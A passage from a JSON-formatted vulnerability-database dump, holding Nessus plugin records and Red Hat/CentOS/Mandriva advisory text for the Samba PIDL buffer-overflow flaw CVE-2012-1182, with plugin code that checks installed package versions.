value:\"p-cpe:/a:mandriva:linux:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsmbclient0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsmbclient0-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsmbsharemodes-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsmbsharemodes0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mount-cifs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nss_wins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/12\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64netapi-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64netapi0-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64smbclient0-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64smbclient0-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64smbclient0-static-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64smbsharemodes-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64smbsharemodes0-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", 
reference:\"lib64wbclient-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64wbclient0-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libnetapi-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libnetapi0-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libsmbclient0-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libsmbclient0-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libsmbclient0-static-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libsmbsharemodes-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libsmbsharemodes0-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libwbclient-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libwbclient0-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mount-cifs-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"nss_wins-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"samba-client-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"samba-common-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"samba-doc-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"samba-domainjoin-gui-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif 
(rpm_check(release:\"MDK2010.1\", reference:\"samba-server-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"samba-swat-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"samba-winbind-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64netapi-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64netapi0-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64smbclient0-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64smbclient0-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64smbclient0-static-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64smbsharemodes-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64smbsharemodes0-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64wbclient-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64wbclient0-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libnetapi-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libnetapi0-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libsmbclient0-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libsmbclient0-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif 
(rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libsmbclient0-static-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libsmbsharemodes-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libsmbsharemodes0-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libwbclient-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libwbclient0-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mount-cifs-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"nss_wins-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"samba-client-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"samba-common-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"samba-doc-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"samba-domainjoin-gui-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"samba-server-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"samba-swat-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"samba-winbind-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:55:48", "description": "Updated openchange packages that fix one security issue, several bugs, and add various 
enhancements are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange servers using native protocols. Evolution-MAPI uses these libraries to integrate the Evolution PIM application with Microsoft Exchange servers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler. As OpenChange uses code generated by PIDL, this could have resulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version of PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0, which provides a number of bug fixes and enhancements over the previous version, including support for the rebased samba4 packages and several API changes. (BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee and himself as the organizer, a segmentation fault occurred in the memcpy() function. Consequently, the evolution-data-server application terminated unexpectedly with a segmentation fault. This bug has been fixed and evolution-data-server no longer crashes in the described scenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages with a large message body or with extensive attachment. This was caused by minor issues in OpenChange's exchange.idl definitions. This bug has been fixed and OpenChange now sends extensive messages without complications. 
(BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated packages, which fix these issues and add these enhancements.", "cvss3": {"score": null, "vector": null}, "published": "2013-03-10T00:00:00", "type": "nessus", "title": "CentOS 6 : evolution-mapi / openchange (CESA-2013:0515)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:evolution-mapi", "p-cpe:/a:centos:centos:evolution-mapi-devel", "p-cpe:/a:centos:centos:openchange", "p-cpe:/a:centos:centos:openchange-client", "p-cpe:/a:centos:centos:openchange-devel", "p-cpe:/a:centos:centos:openchange-devel-docs", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2013-0515.NASL", "href": "https://www.tenable.com/plugins/nessus/65147", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0515 and \n# CentOS Errata and Security Advisory 2013:0515 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65147);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0515\");\n\n script_name(english:\"CentOS 6 : evolution-mapi / openchange (CESA-2013:0515)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openchange packages that fix one security issue, several bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as 
having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange\nservers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version\nof PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version, including support for the rebased samba4 packages\nand several API changes. (BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee\nand himself as the organizer, a segmentation fault occurred in the\nmemcpy() function. Consequently, the evolution-data-server application\nterminated unexpectedly with a segmentation fault. This bug has been\nfixed and evolution-data-server no longer crashes in the described\nscenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages\nwith a large message body or with extensive attachment. This was\ncaused by minor issues in OpenChange's exchange.idl definitions. This\nbug has been fixed and OpenChange now sends extensive messages without\ncomplications. 
(BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated\npackages, which fix these issues and add these enhancements.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-March/019320.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?acd2f3bf\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-March/019453.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1efe6731\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2013-February/000508.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cb66afc8\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2013-February/000644.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5cb6d25d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected evolution-mapi and / or openchange packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1182\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:evolution-mapi\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:evolution-mapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openchange\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openchange-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openchange-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openchange-devel-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"evolution-mapi-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"evolution-mapi-devel-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openchange-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openchange-client-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openchange-devel-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openchange-devel-docs-1.0-4.el6\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"evolution-mapi / evolution-mapi-devel / openchange / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:36", "description": "Updated samba packages that fix one security issue 
are now available for Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3 Long Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls, resulted in multiple buffer overflows in Samba. A remote, unauthenticated attacker could send a specially crafted RPC request that would cause the Samba daemon (smbd) to crash or, possibly, execute arbitrary code with the privileges of the root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which contain a backported patch to resolve this issue. 
After installing this update, the smb service will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-11T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : samba (RHSA-2012:0465)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:libsmbclient", "p-cpe:/a:redhat:enterprise_linux:libsmbclient-devel", "p-cpe:/a:redhat:enterprise_linux:samba", "p-cpe:/a:redhat:enterprise_linux:samba-client", "p-cpe:/a:redhat:enterprise_linux:samba-common", "p-cpe:/a:redhat:enterprise_linux:samba-debuginfo", "p-cpe:/a:redhat:enterprise_linux:samba-doc", "p-cpe:/a:redhat:enterprise_linux:samba-domainjoin-gui", "p-cpe:/a:redhat:enterprise_linux:samba-swat", "p-cpe:/a:redhat:enterprise_linux:samba-winbind", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-clients", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-devel", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-krb5-locator", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.3", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.1", "cpe:/o:redhat:enterprise_linux:6.2"], "id": "REDHAT-RHSA-2012-0465.NASL", "href": "https://www.tenable.com/plugins/nessus/58672", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0465. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58672);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0465\");\n\n script_name(english:\"RHEL 5 / 6 : samba (RHSA-2012:0465)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3\nLong Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended\nUpdate Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. 
After installing\nthis update, the smb service will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1182\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright 